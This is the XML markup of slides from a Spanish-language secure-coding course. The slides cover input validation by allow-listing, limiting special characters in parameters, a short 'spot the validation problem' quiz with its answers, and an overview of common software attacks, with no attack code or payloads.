            <a:ext cx="2344634" cy="851731"/>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UY" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Funciones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Seguras</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C5F6D06-F22C-3A4E-AC84-AF6455D13B96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7812714" y="4004218"/>
            <a:ext cx="3673464" cy="875703"/>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UY" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Referencias Indirectas a Objetos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B21490-CC20-4C44-A035-EDDD9C61545A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4132152" y="3275506"/>
            <a:ext cx="1993558" cy="638220"/>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UY" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cifrar Datos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0220C5E8-E4DE-7544-A9A3-966BFB5D3627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454121" y="3742339"/>
            <a:ext cx="2930723" cy="847514"/>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UY" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Manejo seguro de la memoria</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A5EC628-73CE-804D-95E7-3E9DF57154D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4611657" y="4626871"/>
            <a:ext cx="2681448" cy="807025"/>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UY" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Neutralizar Salidas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56491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7C5A-0D2C-A743-8467-4F0B02FCE92A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="216038"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Validación de Entradas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4D43D8F-DF5A-8842-A7A2-CBFF7F9E7448}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1599698"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Permitir sólo las entradas que son esperadas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-UY" sz="2400" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>¿Dejarías NO entrar a tu casa únicamente a los que sabes son malvados? ¿Y las personas que no conoces aún?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-UY" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Las listas de bloqueos son ineficientes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>¿Tendría una lista de las personas que no pueden entrar a su casa? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Es como darle las llaves de su casa a todos excepto a unos pocos visitantes no deseados.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15140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5365BA6-5472-32B5-1F4D-8B9E94F2679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EFE2FD7-ADA3-90D2-6B9A-DA09C3AED319}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613459" y="3646026"/>
            <a:ext cx="8506790"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rtl="0">
              <a:lnSpc>
                <a:spcPct val="81000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="4620"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="6600" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Juguemos a:</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4000" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="81000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFF00"/>
              </a:buClr>
              <a:buSzPts val="5040"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="7200" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>¡DETECTAR EL PROBLEMA DE VALIDACIÓN!</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4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4652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7" name="Google Shape;637;p38" descr="Picture 1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="607953"/>
            <a:ext cx="12192000" cy="5217975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="638" name="Google Shape;638;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1529898"/>
            <a:ext cx="12192001" cy="325926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="18823"/>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9" name="Google Shape;639;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4497927"/>
            <a:ext cx="12192000" cy="325926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="18823"/>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92957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FA45B-817B-A2CB-C596-B8A9369F5D3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E078E5F-51B5-335B-1C3A-30981BADB707}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1760964"/>
            <a:ext cx="10515600" cy="3336071"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-UY" sz="8800" dirty="0"/>
              <a:t>Respuesta: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-UY" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-UY" sz="8800" dirty="0"/>
              <a:t>Ambos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109008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D5F721-1BB4-D440-9D48-CAE191350ED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="983671" y="1934001"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{365F41C3-2B7A-A946-9BC3-1EB328FF7109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1967344" y="3429000"/>
            <a:ext cx="8548255" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0"/>
              <a:t>Ataques comunes al software – Un enfoque visual</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186776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30CAC-E9C1-1744-7BD7-D070FC6BAE50}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="649" name="Google Shape;649;p40" descr="Picture 9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="117694"/>
            <a:ext cx="12192000" cy="6570329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="650" name="Google Shape;650;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1041147"/>
            <a:ext cx="12192000" cy="325926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="17647"/>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1" name="Google Shape;651;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4371314"/>
            <a:ext cx="12192000" cy="325926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="17647"/>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37878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A9DFB-8E8A-D6F9-5F9A-962D708FD3E3}"/>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11080A8-D133-56C6-EC06-45CBE4D78622}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1760964"/>
            <a:ext cx="10515600" cy="3336071"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-UY" sz="8800" dirty="0"/>
              <a:t>Respuesta: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-UY" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-UY" sz="8800" dirty="0"/>
              <a:t>Top.java</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="391447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BB62-0AA3-8F47-BB80-B24BAB1CABBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="233481"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="5400" b="1" dirty="0"/>
              <a:t>Caracteres especiales innecesarios</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4642B792-1AE0-864D-AB71-3F69ADC4A11F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538583" y="1553935"/>
            <a:ext cx="5176417" cy="4364613"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" noProof="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Muchos parámetros no precisan contener símbolos o puntuaciones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-UY" noProof="0" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" noProof="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Muchos, ni siquiera requieren caracteres Unicode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-UY" noProof="0" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" noProof="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Los parámetros que serán utilizados en consultas de base de datos (como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" b="1" noProof="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" noProof="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" b="1" noProof="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>true/false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" noProof="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" b="1" noProof="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>asc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" b="1" noProof="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" b="1" noProof="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>desc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" noProof="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>) utilizan un conjunto de caracteres más reducido incluso.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7E74587-97AA-C345-BCAF-8DF2009E5C4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5889171" y="1553935"/>
            <a:ext cx="5943600" cy="4616690"/>
            <a:chOff x="5715000" y="1367716"/>
            <a:chExt cx="5943600" cy="4616690"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="Picture 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF863AEE-2EBD-6B4D-88DA-821C5E0E4C7D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5715000" y="1367716"/>
              <a:ext cx="5943600" cy="4076700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6780DA4C-9011-B24B-8624-9532E77966FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7707086" y="3797952"/>
              <a:ext cx="3439885" cy="348343"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="444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UY" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="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B8CB66FD-D5F6-624A-B15C-0D2C8522CDB9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8926287" y="2840715"/>
              <a:ext cx="380999" cy="85926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EB5A22B-52B7-AD49-AF0D-C86E23C1E795}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8146100" y="2194384"/>
              <a:ext cx="35125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UY" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                  <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Alfanumérico</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="es-UY" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>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2" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49168860-1CBB-2844-80E8-A4FD2423462D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9876928" y="4912829"/>
              <a:ext cx="1270043" cy="221369"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="444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UY" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="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9D52D655-FFBD-3F40-A1A0-D705AD62C59E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5914528" y="5338075"/>
              <a:ext cx="517641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UY" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
